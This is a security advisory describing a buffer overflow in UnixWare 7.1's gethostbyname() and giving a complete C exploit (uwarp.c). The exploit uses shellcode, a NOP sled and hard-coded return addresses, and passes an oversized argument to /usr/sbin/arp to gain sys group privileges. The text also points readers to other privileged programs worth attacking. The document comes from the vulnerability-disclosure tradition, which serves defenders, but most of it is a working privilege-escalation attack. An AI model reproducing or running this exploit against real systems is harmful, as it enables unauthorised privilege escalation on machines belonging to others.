unixware7.gethostbyname.txt

`  
  
  
Greetings,  
  
OVERVIEW  
A serious bug exists in UnixWare 7.1's libc. A buffer overflow in  
gethostbyname() will allow any user to obtain elevated privileges.  
  
BACKGROUND  
Is this the same gethostbyname() overflow which was present in ancient   
versions of non-unixware libc's way back when? I can't say for sure, but  
given SCO's record of fixing known holes (remember the OpenServer 5  
Xtlib overflows, still present four years after they were known?), I   
wouldn't doubt it.  
  
DETAILS  
Any program which uses gethostbyname() with user-defined input is  
vulnerable to a buffer overflow attack. These overflows come with  
various eases of exploitability. My demonstration program happened to  
be "arp", but any program calling this function will do. When exploiting  
the dozens of programs vulnerable to this hole, don't forget to check  
your /etc/security/tcb/privs file for other non-suid programs which may  
allow you to elevate your privileges as well. See my uidadmin advisory  
for more info on UW7's privilege system.  
  
EXPLOIT  
--- uwarp.c ---  
/**  
** UnixWare 7.1 arp exploit yields gid of sys   
** Demonstrates overflow in uw71's gethostbyname()  
** use offsets of +-100  
** Brock Tellier [email protected]  
**   
**/   
  
  
#include <stdlib.h>  
#include <stdio.h>  
  
char scoshell[]=   
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"  
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"  
"\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";  
  
  
#define LEN 3500  
#define NOP 0x90  
  
/* cc != gcc, use hard-coded addresses usually within 0x8045xxxx-0x8048xxxx  
unsigned long get_sp(void) {  
  
__asm__("movl %esp, %eax");  
  
}  
*/  
  
int main(int argc, char *argv[]) {  
  
long int offset=0;  
  
int i;  
int buflen = LEN;  
long int addr;  
char buf[LEN];  
  
if(argc > 3) {  
fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);  
exit(0);   
}  
else if (argc == 2){  
offset=atoi(argv[1]);  
  
}  
else if (argc == 3) {  
offset=atoi(argv[1]);  
buflen=atoi(argv[2]);   
  
}  
else {  
offset=100;  
buflen=3000;  
  
}  
  
  
addr=0x8046b75 + offset;  
  
fprintf(stderr, "\nUnixWare 7.1 arp exploit yields uid of sys\n");  
fprintf(stderr, "Brock Tellier [email protected]\n\n");  
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);  
  
memset(buf,NOP,buflen);  
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));  
for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)  
*(int *)&buf[i]=addr;  
  
execl("/usr/sbin/arp", "arp", buf,  
NULL);  
  
exit(0);  
}  
  
------  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
[email protected]  
  
`